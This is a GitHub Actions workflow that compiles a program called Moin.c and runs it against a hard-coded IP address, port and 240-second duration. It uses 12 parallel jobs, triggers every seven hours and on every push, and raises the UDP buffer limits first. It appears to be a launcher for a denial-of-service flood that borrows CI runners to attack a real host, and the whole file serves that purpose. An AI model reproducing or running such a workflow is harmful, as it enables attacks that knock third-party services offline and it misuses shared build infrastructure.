name: Moin
on:
  push:
  pull_request:
  schedule:
    - cron: '0 */7 * * *'
  workflow_dispatch:
jobs:
  build_and_run:
    runs-on: ubuntu-latest
    strategy:
      matrix:
        job: [1,2,3,4,5,6,7,8,9,10,11,12]
    steps:
      - name: Checkout code
        uses: actions/checkout@v3

      - name: Increase system UDP/Memory limits
        run: |
          ulimit -f unlimited
          ulimit -v unlimited
          ulimit -s unlimited
          sudo sysctl -w net.core.rmem_max=26214400
          sudo sysctl -w net.core.wmem_max=26214400

      - name: Compile Moin.c
        run: gcc -o Moin Moin.c -lssl -lcrypto -lpthread

      - name: Make Moin executable
        run: chmod +x Moin

      - name: Run Moin
        run: ./Moin 4.213.160.205 28733 240
